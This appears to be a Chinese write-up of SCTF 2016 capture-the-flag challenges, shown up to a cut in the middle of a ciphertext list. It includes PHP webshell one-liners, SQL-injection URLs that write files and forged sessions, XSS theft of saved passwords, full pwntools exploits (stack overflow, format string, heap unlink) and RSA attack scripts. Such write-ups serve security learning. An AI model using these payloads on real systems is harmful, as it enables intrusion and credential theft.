PENTEST
ETO(200)
学到了姿势,盲注还可以这么搞= =测试了几发,发现是xpath的注入:
然后爆破不出来,根据提示说要利用可见字符,于是学到新技能:
就是利用:
存在的字符去盲注出密码。一发脚本,得到最后密码,其中有一位注不出来,猜了几个就猜出是m来了= =:
Homework(200)
随手注册一发,是发现可以利用’php://filter/read=convert.base64-encode/resource=’去读到源码,看一下注册的源码。看到了是用imagecreatefromgif等函数处理上传图片的,于是想起了http://www.freebuf.com/articles/web/54086.html:,然后就是改图片上传去包含就行了:
直接执行任意命令,拿到最后flag:
Sycshell(200)
依旧是先看源码,一开始对着index上的东西看了好久…在源码里发现内部资料:
本地添加host去访问,发现是张猫,看源码发现大量jsfuck,找工具进行解密:
发现目录,访问之:
用%0b.1e1可以绕过pass:
然后继续,发现能文件包含,读了下waf:
可以发现把phar以及zip禁了,然而…大写绕过就可以了,下面问题来了,如何去getshell,又学到了东西,利用LFI以及phpinfo去写缓存文件。
参考文章:http://www.freebuf.com/articles/web/79830.html,然后改了发脚本,因为这里可以用ZIP去绕过并读取文件,打包一个zip然后去读取不断上传,最终拿到shell:
<?php
$c=fopen("/tmp/hhh.php",'w');
fwrite($c,'<?php eval($_POST[f]);?>');
?>
DrugMarket1(300)
首先在404源码里面发现真正的网址:http://drug.spentest.com/,访问一发,主页貌似没有很大用处,看下源码:
发现存在一个类似于留言评论的输入框,一开始想的是xss,结果随手试了试文件包含= =
然后发现居然可以读session的临时文件,测试了下,发现是直接把name写进session去,然后直接姓名写入一句话,直接成功拿到shell:
然而发现上去权限做的好死……尴尬了,又想是渗透题,现在这个的shell不是我们最终想要的那个shell,于是翻到配置文件,发现数据库的用户名和密码都是套路,很容易猜对了:
然后登入drug的数据库,利用upadte去xss打到drug的后台以及cookie:
然后登陆到后台:
目测是要执行命令,然后主办方说要绕waf,然后绕啊绕,发现空格也不行,但能用{IFS}去绕过,同时nc监听的端口只能是80,于是思路就明确了:
最终payload以及flag:
然后在自己的vps上连接就好了:
Hackme(300)
写在题目前面的话,这个题目真心不只值300分
拿到题目,发现存在注入点,但是问题在于空格被过滤了,使用/*111*/绕过,可以读取文件,尝试读取nginx的错误日志找到后台,然后尝试读取php文件权限不够。下午得到提示xss和管理员会查看备忘录,想到写xss到数据库中,发现确实可以x到数据但是没用,结合提示想到利用xss去读取浏览器缓存,方法无非就是伪造登录框,hook登录按钮,偷窃浏览器的已保存密码之类的,在比赛中因为不可能有人手动输入,所以最后可能的就是利用浏览器保存的密码。于是发送一个表单过去让他自动填上username和password,之后get回本地,得到密码nizhendeyongyuancaibudaomimade,这是对我们赤裸裸的嘲讽,登陆发现是文件下载,之后尝试下载本目录下所有文件,发现../ ..被过滤了,但是只过滤了一次,使用…/./绕过下载其他的文件。源码见附件。发现一个session.php,里头源码是freebuf的http://www.freebuf.com/articles/web/90837.html这个文章,想到可控session,然后发现sql注入那里可以写文件到/tmp目录下,之后去读取php.ini发现session的存放位置是/tmp/,意味着session我们完全可控,另一个就是Path路径里包含了/tmp/,也就是说当遇到一个未知的类,spl_autoload_register会自动去Path路径里寻找"类名.inc"或者"类名.php",并自动include进来,而/tmp/目录又是完全可控的(sql注入写文件)。于是首先http://hackme.sctf.xctf.org.cn/index.php?id=0.0union/*!00000select*/'<?phpr$_GET[a]($_GET[b]);r?>'into/*111*/outfile'/tmp/albert6.php写入文件,然后http://hackme.sctf.xctf.org.cn/index.php?id=0.0union/*!00000select*/load_file/*000*/('/tmp/albert6.php')读取文件确认写进去了,然后http://hackme.sctf.xctf.org.cn/index.php?id=0.0union(/*!11111select*/'a|O:7:"albert6":0:{}'into/*1234*/outfile'/tmp/sess_albertchangalbertchangalbe')导出session
,然后带着session登陆后台,同时访问http://hackme.sctf.xctf.org.cn/05d6a8025a7d0c0eee5f6d12a0a94cc9/main.php?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};在web目录下生成c.php,密码为c之后访问,
成功执行phpinfo,然后去读取文件,发现并不能成功读取,猜测有waf,于是在http://hackme.sctf.xctf.org.cn/05d6a8025a7d0c0eee5f6d12a0a94cc9/目录下写入.user.ini 内容open_basedir=/,然后就可以直接读取上层目录了,尝试一下写入一个.user.ini来覆盖上层目录的open_basedir的设置。
耐心的等待5分钟,使用glob并结合file_get_contents,查找一下就能发现flag
在这里发现了flag
MISC
签到题(10)
直接微博询问即可,跟去年一模一样。。。都是套路
神秘代码(200)
拿到题目二进制查看图片发现0xFF 0xD8开头,马上搜索文件结尾标志0xFF 0xD9,找到压缩包r.zip。
r.zip包可以无限次解压。
期间尝试修改zip突破死循环,使用Stegsolve提取,然后做了非常多的无用功。直到官方提示。
开始安装stegdetect。
找到ftp://ftp.gwdg.de/pub/linux/misc/ppdd/jphs_05.zip。
然后尝试提取数据,开始猜口令。SCTF,SCTF2016,CTF,sycsec等不断尝试。
最后竟然发现是空口令。
拿到flag:SCTF{Hacking!}
Misc300(300)
首先分析pcap,最可疑的地方是qq.exe,而且紧接着有ssl流量
继续分析发现在百度盘下载了一个QQ.chm的文件,打开:
虽然没啥东西,但是为后面埋下了伏笔
二进制显示这个文件头是ITSF,也是个chm文件,打开
猜这个qq有问题
果然,这下pem知道了
放到wireshark里解密ssl流量
其中有个zip,打开得到一个记录文件
这个flag要修正下,按钮弹起后才输入,所以加个o
完整flag:sctf{wo_de_mi_ma_123xxoo}
PWN
Pwn100(100)
栈溢出,覆盖argv[1]读flag。
脚本:
#!/usr/bin/env python2
# -*- coding:utf-8 -*-
from pwn import *
import os
# switches
DEBUG = 1
# modify this
io = remote('58.213.63.30',60001)
# define symbols and offsets here
# simplified r/s function
def ru(delim):
return io.recvuntil(delim)
def rn(count):
return io.recvn(count)
def sl(data):
return io.sendline(data)
def sn(data):
return io.send(data)
def info(string):
return log.info(string)
# define interactive functions here
# define exploit function here
def pwn():
ru('?')
payload = (504) * 'A' + p64(0x600DC0)
sn(payload)
io.interactive()
return
if __name__ == '__main__':
pwn()
Pwn200(200)
整数溢出+FSB
脚本:
#!/usr/bin/env python2
# -*- coding:utf-8 -*-
from pwn import *
import os
# switches
DEBUG = 0
got_overwrite = 0x0804B164
# modify this
if DEBUG:
io = process('./pwn200_bd081fbfb950838cd093174ce5e1cf78')
else:
io = remote('58.213.63.30',50021)
if DEBUG: context(log_level='DEBUG')
# define symbols and offsets here
# simplified r/s function
def ru(delim):
return io.recvuntil(delim)
def rn(count):
return io.recvn(count)
def sl(data):
return io.sendline(data)
def sn(data):
return io.send(data)
def info(string):
return log.info(string)
# define interactive functions here
# define exploit function here
def pwn():
if DEBUG: gdb.attach(io)
ru(':')
sl('2')
ru('Exitn')
sl('2')
for i in xrange(3):
ru('Protegon')
sn('2')
sl(r'%' + str(got_overwrite) + 'c' + r'%' + '12$n')
sl(r'%' + str(0x0804A08E) + 'c' + r'%' + '24$n')
io.interactive()
return
if __name__ == '__main__':
pwn()
Pwn300(300)
堆溢出,伪造堆块触发unlink改指针。
脚本:
#!/usr/bin/env python2
# -*- coding:utf-8 -*-
from pwn import *
import os
# switches
DEBUG = 0
# modify this
if DEBUG:
io = process('./pwn300_96ced8ceb93c5ddae73f8ed9d17b90ba')
else:
io = remote('58.213.63.30',61112)
if DEBUG: context(log_level='debug')
# define symbols and offsets here
# simplified r/s function
def ru(delim):
return io.recvuntil(delim)
def rn(count):
return io.recvn(count)
def sl(data):
return io.sendline(data)
def sn(data):
return io.send(data)
def info(string):
return log.info(string)
# define interactive functions here
def buy(size):
ru('Exitn')
sl('1')
ru(':')
sl(str(size))
return
def show(index):
ru('Exitn')
sl('2')
ru(':')
sl(str(index))
return rn(0x100)
def edit(index,content):
ru('Exitn')
sl('3')
ru(':')
sl(str(index))
ru(':')
sn(content)
return
def delete(index):
ru('Exitn')
sl('4')
ru(':')
sl(str(index))
return
ptr = 0x08049D80
# define exploit function here
def pwn():
if DEBUG: gdb.attach(io)
buy(256)
buy(256)
buy(256)
PAD_SIZE = 260
payload1 = PAD_SIZE * 'A' + p32(0x109+8)
edit(0, payload1)
fakechunk = p32(0) + p32(0x81) + p32(ptr-4) + p32(ptr) + 0x70*'A' + p32(0) + p32(0x80)
edit(2, fakechunk)
delete(1)
payload2 = 4*'A' + p32(0x08049D18)
edit(2, payload2)
buf = show(0)
free_addr = u32(buf[0:4])
libc_addr = free_addr - 0x00076c60
offset_system = 0x00040190
system_addr = libc_addr + offset_system
edit(0, p32(system_addr))
edit(1, '/bin/shx00')
delete(1)
io.interactive()
return
if __name__ == '__main__':
pwn()
CODE
Code100(100)
这题目真心的醉了。
首先 openssl rsa -in public.key -pubin -modulus -text分解出n,e ,之后yafu用factor秒分出q,p,使用rsatools.py生成私钥
然后自己写脚本解密
得到第一个密码。解压,同样的道理解密n,e,yafu分解,用rastools生成私钥,openssl rsautl -decrypt -in level2.passwd.enc -inkey private2.pem -out /tmp/passwd2 && cat /tmp/passwd2 解密得到密码2,密码3同样
解压最后得到flag: SCTF{500_sI,pLE_tRE1S7Re_iN_rSa_AtTa3K_2_24CASF}
附上一血
Code150(150)
写在前面的话:这个题目。。。我们使用的是主办方绝对不希望我们使用的方式。。。我们当时也确实是没想到这个gcd的方式。。学习了,主办方应该是想考察我们数学功底,以CRT的原理中关于什么时候可以求解方程组为思路。但是我们纯粹变成了编程跑数据
(⊙﹏⊙ )b
首先尝试分解10个n,发现一个都不能分解,自己写了一个基于factor的分解质数的Python脚本,在亚马逊云弄了一个64核服务器上跑到第二天上午,终于跑出来一组:
20823369114556260762913588844471869725762985812215987993867783630051420241057912385055482788016327978468318067078233844052599750813155644341123314882762057524098732961382833215291266591824632392867716174967906544356144072051132659339140155889569810885013851467056048003672165059640408394953573072431523556848077958005971533618912219793914524077919058591586451716113637770245067687598931071827344740936982776112986104051191922613616045102859044234789636058568396611030966639561922036712001911238552391625658741659644888069244729729297927279384318252191421446283531524990762609975988147922688946591302181753813360518031 = 122281872221091773923842091258531471948886120336284482555605167683829690073110898673260712865021244633908982705290201598907538975692920305239961645109897081011524485706755794882283892011824006117276162119331970728229108731696164377808170099285659797066904706924125871571157672409051718751812724929680249712137 * 170289910812835465096338542997477487359435798641693381125276912070602548711328219190092923698137571174584001618243726404688552257457773360565493810569068383273664286929905167374986060851892496173584735684037889535771979124074591360189776288360130316240776662582509201693427241370225544170475960286150066498263
于是可以写脚本解密了:
import gmpy
p=122281872221091773923842091258531471948886120336284482555605167683829690073110898673260712865021244633908982705290201598907538975692920305239961645109897081011524485706755794882283892011824006117276162119331970728229108731696164377808170099285659797066904706924125871571157672409051718751812724929680249712137
q=170289910812835465096338542997477487359435798641693381125276912070602548711328219190092923698137571174584001618243726404688552257457773360565493810569068383273664286929905167374986060851892496173584735684037889535771979124074591360189776288360130316240776662582509201693427241370225544170475960286150066498263
e=65537
n=20823369114556260762913588844471869725762985812215987993867783630051420241057912385055482788016327978468318067078233844052599750813155644341123314882762057524098732961382833215291266591824632392867716174967906544356144072051132659339140155889569810885013851467056048003672165059640408394953573072431523556848077958005971533618912219793914524077919058591586451716113637770245067687598931071827344740936982776112986104051191922613616045102859044234789636058568396611030966639561922036712001911238552391625658741659644888069244729729297927279384318252191421446283531524990762609975988147922688946591302181753813360518031
print n==p*q
phi = (p-1)*(q-1)
d = gmpy.invert(e, phi)
c=0x68d5702b70d18238f9d4a3ac355b2a8934328250efd4efda39a4d750d80818e6fe228ba3af471b27cc529a4b0bef70a2598b80dd251b15952e6a6849d366633ed7bb716ed63c6febd4cd0621b0c4ebfe5235de03d4ee016448de1afbbe61144845b580eed8be8127a8d92b37f9ef670b3cdd5af613c76f58ca1a9f6f03f1bc11addba30b61bb191efe0015e971b8f78375faa257a60b355050f6435d94b49eab07075f40cb20bb8723d02f5998d5538e8dafc80cc58643c91f6c0868a7a7bf3bf6a9b4b6e79e0a80e89d430f0c049e1db4883c50db066a709b89d74038c34764aac286c36907b392bc299ab8288f9d7e372868954a92cdbf634678f7294096c7
msg = pow(c, d, n)
print msg
print ('0' + hex(msg)[2:]).decode('hex')
#sH1R3_PRlME_1N_rsA_iS_4ulnEra5le
得到数据之后写解压得到flag :SCTF{5o0_mAtI4E_TrE1SUre_ILn_rSA_a55aCk_3}
写在后面的话:这个n分解出来之后我发现,所有的n值存在一个公约数,也就是说,这个题目其实很简单的。只要想到这个,直接使用Python的gcd就可以分解出来一个n,然后就做出来了,但是当时我想多了。。。我以为是考察数据的并行运算。。。。
Code300(300)
有两轮加密
第一轮:
注意到这一组加密数据中有两个n是相同的,而且加密内容相关,并且大部分相同
可进行 Coppersmith’s Short Pad attack和 Franklin-Reiter related messages attack
参考http://mslc.ctf.su/wp/confidence-ctf-2015-rsa1-crypto-400/
完整代码:
from sage.all import *
e=3
n1=25357901189172733149625332391537064578265003249917817682864120663898336510922113258397441378239342349767317285221295832462413300376704507936359046120943334215078540903962128719706077067557948218308700143138420408053500628616299338204718213283481833513373696170774425619886049408103217179262264003765695390547355624867951379789924247597370496546249898924648274419164899831191925127182066301237673243423539604219274397539786859420866329885285232179983055763704201023213087119895321260046617760702320473069743688778438854899409292527695993045482549594428191729963645157765855337481923730481041849389812984896044723939553
C1=21166198637119799018016204295250536166915856638919405261840915314988042873432620518577615132448448723327689478678755172462556682889571075891041516220834941489006219250712233683372349063466237177709867416916476985170093387554152232327527581466143780222560210446663108294424857649820851271308341178467886091578116410156922264637037227745852409331989620504
C2=21166198637119799018016204295250536166915856638919405261840915314988042873432620518577615132448448723327689478678792176422644662336966050363940635331361205793418179945076116432708809590928145030795258923206911694439533855629978563382617578406639244014003848531540613075972495030572800107200489470498647236710018970753334604604728734347799544201644707336
PRxy.<x,y> = PolynomialRing(Zmod(n1))
PRx.<xn> = PolynomialRing(Zmod(n1))
PRZZ.<xz,yz> = PolynomialRing(Zmod(n1))
g1 = x**e - C1
g2 = (x + y)**e - C2
q1 = g1.change_ring(PRZZ)
q2 = g2.change_ring(PRZZ)
h = q2.resultant(q1)
# need to switch to univariate polynomial ring
# because .small_roots is implemented only for univariate
h = h.univariate_polynomial() # x is hopefully eliminated
h = h.change_ring(PRx).subs(y=xn)
h = h.monic()
roots = h.small_roots(X=2**40, beta=0.3)
assert roots, "Failed1"
diff = roots[0]
if diff > 2**32:
diff = -diff
C1, C2 = C2, C1
print "Difference:", diff
#x = PRx.gen() # otherwise write xn
#x=1002
x=xn
g1 = x**e - C1
g2 = (x + diff)**e - C2
# gcd
while g2:
g1, g2 = g2, g1 % g2
g = g1.monic()
assert g.degree() == 1, "Failed 2"
# g = xn - msg
msg = -g[0]
# convert to str
h = hex(int(msg))[2:].rstrip("L")
h = "0" * (len(h) % 2) + h
print `h.decode("hex")`得到F4An8LIn_rElT3r_rELa53d_Me33Age_aTtaCk_e_I2_s7aP6
减去userid为
F4An8LIn_rElT3r_rELa53d_Me33Age_aTtaCk_e_I2_s7aLL
进入第二轮:
明显的小指数广播攻击,参考
http://codezen.fr/2014/01/16/hackyou-2014-crypto-400-cryptonet/
完整代码:
from struct import pack,unpack
import zlib
import gmpy
def my_parse_number(number):
string = "%x" % number
#if len(string) != 64:
# return ""
erg = []
while string != '':
erg = erg + [chr(int(string[:2], 16))]
string = string[2:]
return ''.join(erg)
def extended_gcd(a, b):
x,y = 0, 1
lastx, lasty = 1, 0
while b:
a, (q, b) = b, divmod(a,b)
x, lastx = lastx-q*x, x
y, lasty = lasty-q*y, y
return (lastx, lasty, a)
def chinese_remainder_theorem(items):
N = 1
for a, n in items:
N *= n
result = 0
for a, n in items:
m = N/n
r, s, d = extended_gcd(n, m)
if d != 1:
N=N/n
continue
#raise "Input not pairwise co-prime"
result += a*s*m
return result % N, N
sessions=[
[21778816622407043254249033744556437773178718344170907687035355752306254181495272254316323076827432323583279284697609943296234700945010885010381052459024155936090811012664924674758219163065019349740707282354505096608107707774970709715259835448587834080152409078047162951805940071358655938727249679105305351838950073539149057650448964397736279148746703675407495243942505041731104580156762842345374978325029947055323567120523592936170640156611551704828034384851988154353272897487218723570180022092379408219114849763765186588476489924721044926152006318666687949095907516827647042434514271847608156543261745856327152256691,
0x36a66571751faf3bbf6ad760adbcd1be123d2ab526d2fbf6697ec38c7d4ee7d709d8ab3f154092410f46ae18ac75aa32ec9393a98385cd8d8df3b5a15eeccb2637b353f6808fd39e11faf2b742eb0597f8e7a977196171b031c076140cb05c771d8df2f81d8b904e8bf579da0e568fa67d0a94a7607a002c456824e7ea71df895f1967b12ac36eade287589fd556c71520d2dfdb1a8663dcae615cc40be1ff82ae42ae617db75bb1dd88235fd698b53921a42fa6390854eb1393d24341582ce83bd690ea12d2697bc929a77b51adb04131baee52050340be9a2be6eaf795b6877bcc22d5d8cce3829485340b641585ba3ad169850e780562467fbfb09f4f5235],
[16903196746534976770297193591563118819340996326353278926932894774572875445074235633598238073286562040907331827987129504332575088363961056320711957070361568300931751447818086187098450831958791194454471761207974960285694400991565796076896861484262801877894234189007108688232929103575715501208714450050820596757093532908538335247758665436735062990069823263343612343383280128868367115993204155509197451034689222789081909649433189803691801997724286399861059723879464142218791577045451380036235131262854852861711356480129365121825413631051962999057782796860262353799309363207995917585708071851074274505668412220771866627801,
0x51bd5b18e527dc109cd202f39841bb39422dcc1f566f59da4c623d7166730dded90963c825ba6300c0dab181f69f12ba40955e68e6040f794ee642aa26acf437ce382a0ebdae8d3c77398a01f55eb2593d243e991427197f6166b117e8bdfa3164d99e5713f18d64947c36afba69d0c9208e79815af20cb4dd201bfcacd485e8cc98cbeee1b75d6d2b1ad81276647b6f7b2137cd9ff9e2594b9ec8952fc2d184ba69e8a17fa5dc865b6e96552d81750e85ef427ad184b2efc5534fb6f70f8d096b3029dd71349b571fa1997fd14002625cbea894811c7bf8f582dba0ec9d03edbf25517179bb7f20288cc2e2ab0b038185ac525e891c15c151d47a14886f947],
[28265280613183354342105753166996328090546389493099576671064332905506043149645894359529530572985221453256974871551423452437262179254048995385871426911106523040024082014701860288597240859367709958593683404815121262284405370456892785825244621855179713916387058136808290106777122592782679759913015048141455589449020109912456204732596642195119782747444413318147656712489309539304507463058220125712352312270109971524224764775787216566974066782153169186108327462634247269028163635556628016922590640886497451631819173964909716933392801888324681183442906718285722236884230908714776131247765432042336528688391266197013577846933,
0x8df94ca10d136659aab94677d5826184addcef8cc563009822519b157c368d17434b9b6fa08ad783003d0aafc6370938e6c795d93968cf094260ef05f1f65b03be9aef4d0e8b4e5ef8bf9182e382b08a38c04bb448097eb1ee93bd9ddd6abe39f2f356ffae8470f7d63edea2c87b7b7766c57e24086f59825f5f50d5ed7443adfb26dd3bbdf662cbf082a9415b73a8c81581272a4b8f75f656ec03370e53fc88382e842a75f329c510aa09c647afde2fcee7a5924806a4f7b57cb0ed769c4db41f35e48c5812fd75315697e936fdeacd366c851e06b30050cd93205c4fb233233990fc2b5a0c9cd2aee58209fc04c6e782f2639d51fb43d7952b2f8afc1a4403],
[24987127899477465012251233743493253536476854495637178599192050225313102219411387898487200182441114487612034816488014846231399460666971909474486058085384163710434277132512228943824562960928753528438748273225337688628804876346934893738809200953670621279519453757412491449591854561780627642156687194962761756188282130022320565958645871385780190162615031780472674474233554299969022151520347624742464620679084328782555875295855846135397397113343536139827427341184253483944102522989539698394227074217940278304502858391155867844668912171244350562320306827896547118036618397962042775133094735525961981341552292221448084885029,
0xbe73713e7928b1970d6dd531e0c9a6a3884bef82c3a39a043f226e88cfe54a3dc28c515893463e1039a14e49c8d27154544f9f3f8ff4d750b56ad41ef3c5b1710e889a4d8845722c6588f51f2bf601a0b816489b6afa23e909d4201b570788e0cae3ab521ae2ae507a02a5af46036c496459bc86f34a141fad1802d578c645164b5c0fb91978b07efdb8b9036028d4ea21b4719eae9caf6247daa9c9639f7b79521c7feaf1e9b22852f32f91f93631e03eb7c091d3ae27858faea04481a1404c543b13c9ffef06326d7d6f67db7f05f91611a3d185fb6fc1e1fb07b01c83e46c84495a252ba4eb0aa3a148ca4b6dc61492eb71e3b5bf7473595ed69841ce0b94],
[20690588543759338459201261102131523557602951858621022352768878495764772818047444561085946463647026323512505467898486038702296544581574454427913943957312980485120682984328258470676756700031559606051601837978676090075103759061046354026481363302764050167452089628379324207470363334371464572866980379277784494909108912432265324937412023179282154446352432584206636315270087668925211674657165676558801771127073793675007651877248218291179047124458484980007843300303269623821337776079296736563393494962515203685309350731743104371337237221338067550042391180955737666453436685882807146647050068939961249283782794859263934790927,
0x321516de98f8d6584adb01d5783d13cee2daf74f2285c693debe3a264c0b9a637b42c17a61a3870c70acdfdcbb3ebe49fb57c40079d4f82fe4051b5374545562baa12d894baa66016c4d025ace559bd7b5d658d70e0e7db5a24a212a48a5e9ba44dc091c4846f60509fe00b780db6101b73cfc2492be2e75bf9e82b727ab6b459df8280e83e59119795a82acd53e982fa3ad82ab80a4213728c41808d53cc75e2a19801943ff1af19e85aaffb1b29a41c0af54ca44335d611713e5ec6ff38675de8704fa2ddaad90b50cf4553174a9ae7fd61e72c5cc8a77df159a21d67539e92ff702ddef11c91eb39c247355426f22f87de33f8d65e5589553405f50a78c84],
[16517102081052861630895919001217675526698277369300591711866049102573903641338088651465353677681314133196137354591046807286864279671925133798556675780456365747859903691818373002538419664235941077881320873723974912890141942864109366960284815031822877720076646042209075936969869701929261677727681050077163026469462157471618274966461347360748386423007148375581277546370022280825631242730771828201301160075215196139318450096889249372085484891067811333463883782678293168327177450855394281994969889305548254268708625415414795510941577246484314728636995608221724256782771789486658328851046459586540232884627529177340560416993,
0x52cc422ae1012a854e0d29b9b1da6e68ef3a3fa6b8d7551c1c664875e277149411244279eddcf9656fe182c4bfadb33d2d917e7faa580c517d7960e9934813185331e9c9fa3698fa9de3f8aad5786249fc0505db05f01c43dc0dac422c51114aabc5d0451a921e36e47d9c4654574076dc04d2778ff9bcaa7ed3be2432bb515c4721013d98a569b794cf027ab9e356dde48fd06287f78982fac010e5abee0aa71388f270f70c53f0f1ac091fdbbe380c1e67e1079a2a6ea7ae6f2173fd1c39994e4436ad058996b0eed5cbc2ef10e4e6c814fad9b62056d7701976ce88fff49e864ca23b6ff762168436f7aaf0ce379515fd0d4d97367c0cf8ce7242fe6809cb],
[23846860290279092907572444079539617462214354239782236629759070773513973525414800313619141664302186747496495971163746242055682769265827639472645512416038516482082192479180022255538780293810541273933187169499865844979861261417193700451844441299094590593715164464011149534562230605044072398232865628048059788633187389023568417475139388654021193716658660041159730755563837795152394878078579534655463322616283839623641180779934135529522581271802799149690558550140547741565135720412155964520008772101738405928224251101453422360053273769367642925204442743550811319417756071808630071840203875705299338612909277917097442575231,
0x7a4c0c06b31aa9be92dfcc10af0b4d99429bd0d2465d43c56e7488136db91347f7e40213e82b5bbcafee449614d9c26237dcf6ae1118f345d5f76a7b7fd665146103c4ba9cf63444363631b2e847a9ecd6126931299c30a31582d0fe918e71251d80bb7b3a3c27833379d12ca45fb339b169340335af84131a8848c7ac56533964823ebc1cc78dc69f136e735a46b9af5123b31171ff27e71f7f11e25878451619c199b04a93414effb74e90effd91a24735a77d3364020ae38883addac5c7f71e6a0e57d82d47c255c172f084a707ea565daa9d121693ae94391fa4c0fa0e3ad877b03014469bda192aebe3e4cf8fcc8469636ed8a74659cb4db0e8e5eecd9a],
[17566701282456258503708647404558041579376753416636895921624574676679101724033623273314113990594123807428022978359642275344892917569831939503189948668240865309669039814491983430907110218013111893576410298548024847128844676202137898746346628853860982276196072572409817530124631239728733042716676159813363682748753083182297029995941313117294252250686136554964244869449490234400819447482806975167157303480233831491591302798414444021786972185652092240434726936513164112181591526851025405006672553646267337903731497655811302924232073336996144108764372355652364792853587376409404275388013071072585640297921892859159400948323,
0x3fc5f6519c720d08da16c2df2112ba76d718329a8a8cdcace3bc2b07d603cad7e492ce13ce537bddef922ee8fabf8261a27dbc0ca94752a2fe8016b99088a4cf794126da4673e7cea14428a7f3bb2a50f489d0a507b3fb3c6541f4d25941558180e28db6938fd6e92856ba10e56d2100f0d12fe6dd64e8d75ff5ad91f446b0481412ab10d08df34cdb7213df180cfa342e38af893750c9df36987f630083985588b7758cb3b83559485f208ac5b8c2df81379b69565adae0ce38ffbe568715cca87381d72508bc278e374acfb0b9db4726630dfdb6771ac3de26c0ec48ce72cec92af4d610f312474d979d7a445cd0aa16d9bfb8c8434449aacf9ea3acd23653],
[16253121383768278209005558577055644569117707124854929186667128310606493315013449858902615940095488323028876191616816961215480161502334848550714559842262203333048521009972976254796089176241431933391814530903987798419098078087110325298127023185881308297696190844006356371502958261262318737874080358501446648868436314810687974775378172524379297271535579000788274835896943322448320754626535308836129262616406664292901764961851722791991015882750059327988224491748375219523130042075320130650865135318796823056748272833680628813950407501372466385030092017640922132792751107909729923267741621440199097930132480628796900772029,
0x6db31ce529ff59c5e2a06cee7c7ff63b26b5297a359c87edd61d144285a99cb22a311a75dbe8d5a1a7fdcc8eef52a4a1126ef2e09a38b1f5e17ee0c0c1d802e4ff2179ad66336613ca539d1ea76144e832b8faf7f9f09d0b061a8c70e13173037ef1255941deae9942a8bee684c46df73fde2ba15bd925255f61ce3f4748060388b572e914f2e8a7068f026550fb06f283dee852a44ce9d80e572a9a9c84a26d9f35308907ad995bd4bb29893e23b725611c39676cdd9bd953ec2b988d2344d95c96a5cf3f9daf9449ee3e57abad421038d33a14ab9eaa91421cce008c2b7a49085e555fde59a07e4c0bb3da1a487bef263608cf9001c2cb3a0f128f8ffdc4b5],
[20290309021976181378150079070647362877361051642116884020698310582404348426365349349830932277074553597811144356035164416874783743981763606447828375623172664133086570212409720630779251662198484608733581283249766121177416927096509366175689816558284636310339765253094030229680886254669960511903436585522016222678724597374152265027493130428700298457508264585197242398693292101535859643883683283228422929797265173483141156963526966092200813029155535719102888182314267564367377779201639949508213735381237773042753101422482552209042450075752883511314469026255991162957376905635040303277884398802599054812153590799774042488237,
0x47fc4dec774af58a10a86f32aca278b7333e2a203f32d1c3829f77ee1ca4bb26967d46f2501ebf00f1b7d183245ae9230c27a1b44e77b943e6b666c1eb93d77c400accd3be53637cfcdf42617ec7e49ad7466e779ff1deeb26d055a40d4028845e07225acd900a158e3264301f3f474db2d185f18c7178eb6bb22af198527bf714ca70e4b1b8786595e59db4a1e7666d4f11aab6d8b8cdf92d25fe1371853bc191223dfa1e3a1eb0ddc139b23bdaa34b7b628c420752911689bd2360355e0991e7824ec91fa5a16a04bcdb20b21859c2101187c5901fd83c33842d66accae05e9f8d52390245d154c6f6fd70cc9df06a7cb6beb8e97158dd008b289cc298b5be],
[20259407522505114352438066790031189161692762499783918150615320203040060613651670031363001854418241949806197697617226051714447759568062273100011096875597755138510617995005919992091359670438072021331669362289193281360914280630669617706120960853381676622726602146361520387706665131232782238093270978205858281738902665202342179262150897459523695977783336806799817685658837013961068870176413359582541169367864085705134004595535049333058874635763188301138178673153768451934569823185195476045661392099691197429028316750422385531970917919762595412998928711638811089289412827922269444823536467731873971772055257114762319315393,
0x3879320d2b72a7d476f911a621a2cde56cb4f11bf6f2092a1d0e37732e39587ea5c8cc8012b865315823bb095513e0aaebf00a1d0bc64ffec621ba88574893741d16a051962eb48e6ce7a7bcd1c200b93d43de4b913fa04a33aa6ecf1cbe8b6224f86acb6fc30e3c9809265e94e89f5d9e86149263ab1e094e47a3b5a11402daad15f1af9f4af6ac6fb5042e46c16b5cd0339c07311bfbc12f5c55d56575d340fe3409fc0cdc53c70ef188de0fa5361f964e3dda4cfa93e4c1dcc2899b54405ab1a86377cbd52c804c8abe1801fb58e07cb4c12ccc7dae2d5fdcd99e7e0b41455a211b418d7d23eec52ab5964a9cf8e4dd644db1643b23162a84acd394315f26],
[24318293739308347213079240931318897629475758007636953845697423973047760974896821730716872997882728166077874860101084256173936300391518418843018259609362471240020891953344922995571854332425076721361761155823416339736617753479873947815911700571886068424319666101274062537135986686198448291523526831919231309046418709526942081443652930546060758807699063472901121389294694164314428552216115807784803759664471770162896322173399815832732844819985897349926942832673618305532813094961669876922754219436080392413448963260311884490822861732752909321638280022645654810271403290958260903318384943003470764808099607444730775850977,
0x3744c133e79ad8c24d42c184ef789b2e8f98a436413a1759a3d3877a7be779d20237ca9f8795da75101b58f67a5cfe3862c09381b90541f9744b48d0c181d77238e30c5ff3c17b7d61cad61375028a9f5df2ba8ba4b03149932aee7e44a225c0861e6544a1fdf6c9c76f6a3e82d585f82ea9f5db917742d057a6f1cd05173e125f98d10e938cb4a81d963adfd557a4341e361f0ad258cf0898a2f129e84ecb010006f72c56e23d49af995a0c3627c37cd94b4f605834a31297e810ab5edeca323a7ab1a557376cc363918b8fab2391afc2d6fc835d68530aea668e3fa5fad2a820289b2c69fca87b9864b7055aaede029738665807a1234c3438b6df933b5011],
[16767369591676471537411283105560692097106856689402131801972215792616408134559976771743130058361434086714770802148737506939664570683450741935689264391158401406372136118114570763009411773231927726730263665758441518136374811604790203589734839203990618958929058849509041656812300142186514602133644716549714328026432640542797308159792476463973843503510250484074033909180332466382455960693392142248674005373879029496304626751064305166382888538959190215229722452450797037929073904543004398559319989715734497042785049819377997233813308055108035958732985392827704742206908811830255998822273272225412690773092101546168169226819,
0x80e66bec156f4f23de053a26b431b5c9403b866b9e3db1bff70294fa02b9e2b190784b2c00a80b8ca68ada1a346901b23a18e64e2e72af65e692b682c63104e18705ed660c5bb8a7dc92210dd6b39c9da4ff6dbead8275cda95137e35b827257077089a3b3943cb25475db403246547328d026bf1ae84c0945d4eac09a5b19f3d876fc8a7634db369366d9890794a8420b7f68993176d4ed5b8898b9162220fba24400437af66f5272ae76903af9f20c6e73d64d6d90fb93423a8732883e3f1a73c49865026a5179ced111c830a960444a1000c6e3aaf2d73093979507ac2f8bd44dd3977d27f9092934d43daa7f2054cef40858fcdc4caf9d60b2a930dc9882],
